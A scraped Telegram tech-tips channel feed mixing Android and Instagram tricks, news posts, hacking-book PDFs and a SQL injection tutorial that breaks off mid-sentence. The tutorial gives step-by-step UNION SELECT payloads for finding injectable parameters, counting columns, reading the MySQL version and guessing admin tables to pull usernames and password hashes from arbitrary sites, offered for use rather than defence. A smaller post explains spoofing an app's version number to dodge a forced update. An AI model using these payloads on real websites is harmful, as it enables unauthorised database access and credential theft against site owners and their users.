Tech Byte
5.11K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
How to get Hundreds of Instagram likes and Followers

Hello, @romL3N here. In this tut, you'll learn how easy it is to get hundreds of real Instagram followers and likes on Android, and how to do it yourself.

• Download an app called Neutrino+, I'll link it below. Launch the app, connect your Instagram account and you'll see your profile stats.
• Now the main part. There's a count at the top right of the screen, it counts the number of crystals💎 you have. Tap the arrow next to "Update Profile", there's another energy⚡️ count

The more energy you have, the more 💎 you'll get, the more likes/followers you'll gain.

• You get energy by following/subscribing to other accounts.

For every person you follow, 10💎 are awarded to you. Once you get 360💎, you can promote yourself in the TOP list for 10 minutes, get 650 💎, you'll be able to promote yourself for 20 minutes.

• Just keep following users in TOP and get the desired amount of crystals and you'll get to promote yourself in TOP, so other users see you, and follow you.

• You can punish unfollowers by deducting 60⚡️ from their account, and it'll be added to your account.

• There's a daily bonus of 30💎 that you can claim every 24 hrs.

• Tap the 💎 button in the bottom right of the screen. Next, tap the big 💎 button to start generating crystals by auto liking photos.

• Want to get crystals without following or liking posts? There are tasks (surveys, watching vids, installing apps) that you can do to get more crystals, and you can transfer crystals to another account or get likes for a photo by another account.

This app is a simple and easy way of getting real active Instagram followers and likes. If you open it regularly, you can get over 500 followers in one day.

@techBYTE with @RLapk
Solar Eclipse Live Stream

You can stream the events of the #Eclipse2017 live from NASA. Visit the link below. Join in the conversation on Twitter using the hashtag #Eclipse2017

http://cogismith.com/H6I
Android Oreo 8.0 is here!

Google welcomes the #Eclipse2017 with the latest release of Android, codenamed Oreo, after our favorite cookie brand.

This new version of Android packs lots of features, it's like having superpowers!

Some Features:

2x faster: Get started on your favorite tasks more quickly with 2x the boot speed when powering up *boot time as measured on Google Pixel

Background limits: Android Oreo helps minimize background activity in the apps you use least, it's the super power you can't even see.

Autofill: With your permission, Autofill remembers your logins to get you into your favorite apps at supersonic speed.

Picture-in-Picture: Allows you to see two apps at once, it's like having super strength and laser vision.

Notification Dots: Press the notification dots to quickly see what's new, and easily clear them by swiping away.

Android Instant Apps: Teleport directly into new apps right from your browser, no installation needed.

Brand new, redesigned emoji

More features and how to get it: http://cogismith.com/TdC

@techBYTE
ANNOUNCEMENT!

Please, DO NOT install Android O builds from uncertified websites (like blogs). Make sure you check the officially official releases for your device from Google websites.

Pixel and Nexus users are the first lucky ones to get to get the "superpowers" of Android Oreo.

Check official docs on android.com
How to use an outdated/expired version of WhatsApp

Your WhatsApp expired? Required to update but you don't want to? Here's a workaround to use an expired version of WhatsApp.

- Install APK Editor (linked below)
- Open it and choose "Select APK file from App" if WhatsApp is still installed in your device or "Select APK file from file" to choose it from your sdcard
- Select WhatsApp
- Tap "Common Edit" where you can only edit app icon, name, package name, and version.
- Edit the version number and code to match the latest version of WhatsApp
- Tap "Done"
- The modified app will be created. Uninstall the WhatsApp you have and install the one you just created
- Now you won't get that annoying "Your version expires on..." pop-up

@techBYTE

Apk Editor: https://t.me/RLapk/274
The Telegram Bot API v.3.3 has arrived!

- Mention users via inline mentions, without using usernames.
- Get pinned messages from group chats.
- And a little more.

See the full changelog here.

#BotAPI @techBYTE
I'm collecting the best Android & PC homescreen setups so I can feature them on this channel. Anyone can join in. To submit yours, take a screenshot of it and post it in our group, @GEEKernel, with the names/links of the tools used (launcher, widgets, icon packs) as a caption.

Submit >> @GEEKernel
The Hacker's Handbook by Hugo Cornwall

PDF
The iPhone 8 is confirmed to be released at 10 a.m., September 12, 2017 at the Steve Jobs Theater in Cupertino.

@techBYTE
Homescreen Setup3 from @CoolKiddo

Nova Launcher Prime
Zooper Widget Pro
Nougat Icon Packs

@techBYTE #SetupWars
Homescreen Setup2 from @daniellartey

He used Rainmeter on PC. Smooth desktop setup

@techBYTE #SetupWars
Homescreen Setup1 still from @daniellartey

Used Nova Launcher Prime on Android

@techBYTE #SetupWars
This is just the beginning, we'll hold more "contests" in the future and the winners may even get rewards. Keep sharing this channel, join our group, @GEEKernel, if you haven't and have fun.

Text me, @romL3N, to decide what the next #SetupWars will be about. PCs, Custom ROMs, desktop skins, consoles,...etc. Ciao!
Hacking - The No-Nonsense Guide @techbyte.pdf
968.9 KB
Hacking: The No-Nonsense Guide

Learn Hacking within 12 hours with this guide. You'll need Kali Linux dual booted, in a live disk or a virtual machine.

Happy Hacking!
- @techBYTE
As I promised Today Will Show You How To Find Bug On Site!
Check for vulnerability It's one of the most common vulnerability in web applications today. It allows attacker to execute database query in url and gain access to some confidential Information etc...( In shortly). Let's say that we have some site like this http://www.site.com/news.php?id=5 Now to test if is vulnerable we add to the end of url ' (quote), and that would be http://www.site.com/news.php?id=5' so if we get some error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." Or something similar That means is vulnerable to sql injection :) Step 2:- Find the number of columns To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (We get message like this Unknown column '4' in 'order clause' or something like that) That means that the it has 3 columns, because we got an error on 4. Step 3:- Check for UNION function
With union we can select more data in one sql statement. So we have http://www.site.com/news.php?id=5 union all select 1,2,3/* 2010 (We already found that numbers of columns are 3 in section 2). if we see some numbers on screen, i.e. 1 or 2 or 3 then the UNION works Step 4:- Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -- it's a comment and it's important for our query to work properly. Let’s say that we have number 2 on the screen, now to check for version we replace the number 2 with @@version or version () and get something like 4.1.33-log or 5.0.45 or similar. It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." I didn't see any paper covering this problem, so i must write it . Step 5:- Getting table and column name What we need is convert () function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* Or with hex () and unhex () i.e.http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* And you will get MySQL version. Well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe for MySQL > 5 version. We must guess table and column name in most cases. Common table names are: user/s, admin/s, and member/s ... common column names are: username, user, usr, username, password, pass, passwd, pwd etc... I.e. would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (We see number 2 on the screen like before, and that's good ) We know that table admin exists... Now to check column names. http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (If you get an error, then try the other column name) We get username displayed on screen, example would be admin, or superadmin etc... Now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (If you get an error, then try the other column name) We seen password on the screen in hash or plain-text, it depends of how the database is set up . i.e. md5 hash, mysql hash, sha1... Now we must complete quer